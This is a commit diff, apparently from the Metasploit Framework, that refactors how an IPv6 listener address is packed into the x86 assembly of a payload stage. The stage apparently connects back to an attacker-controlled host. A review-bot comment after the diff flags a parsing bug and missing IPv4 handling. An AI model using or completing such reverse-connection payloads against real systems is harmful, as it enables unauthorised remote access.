Clean up ipv6 address assembly packing

GSoC/Meterpreter_Web_Console
Adam Cammack 2018-06-13 15:31:49 -05:00
parent d6f0673840
commit 0d9eb5b662
No known key found for this signature in database
GPG Key ID: C9378BA088092D66
1 changed files with 6 additions and 10 deletions


@ -38,12 +38,8 @@ def generate_stage
tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string. tcp_port = (port_order.map{|x| tcp_port[x]}).join('') # reorder the array and convert it to a string.
# ipv6 address conversion # ipv6 address conversion
words = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V')} # converts user's input into ipv6 hex representation # converts user's input into ipv6 hex representation
first = words[0].join(', ') # removes brackets, otherwise will reference to a pointer words = IPAddr.new(datastore['LHOST']).hton.scan(/..../).map {|i| i.unpack('V').first.to_s(16)}
second = words[1].join(', ')
third = words[2].join(', ')
fourth = words[3].join(', ')
payload_data =<<-EOS payload_data =<<-EOS
xor ebx,ebx xor ebx,ebx
mul ebx mul ebx
@ -61,10 +57,10 @@ def generate_stage
xor ebx,ebx xor ebx,ebx
push ebx push ebx
push ebx push ebx
push #{fourth} push 0x#{words[3]}
push #{third} push 0x#{words[2]}
push #{second} push 0x#{words[1]}
push #{first} push 0x#{words[0]}
push ebx push ebx
push.i16 0x#{tcp_port} push.i16 0x#{tcp_port}
push.i16 0xa push.i16 0xa
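Review bot: The `scan(/..../)` split on the new `words =` line drops or misaligns chunks whenever the packed address contains a 0x0a byte, because `.` does not match a newline without the `m` flag. Unpacking the bytes directly avoids the regex: `words = IPAddr.new(datastore['LHOST']).hton.unpack('V4').map { |w| w.to_s(16) }`. The same line also assumes a 16-byte result; for an IPv4 LHOST `hton` returns 4 bytes, so `words[1]` to `words[3]` are nil and the interpolated operands in the second hunk render as a bare `0x`. Unless LHOST is validated elsewhere (not visible here), reject any address that is not `ipv6?` before building `payload_data`. `generate_stage` starts and ends outside both hunks.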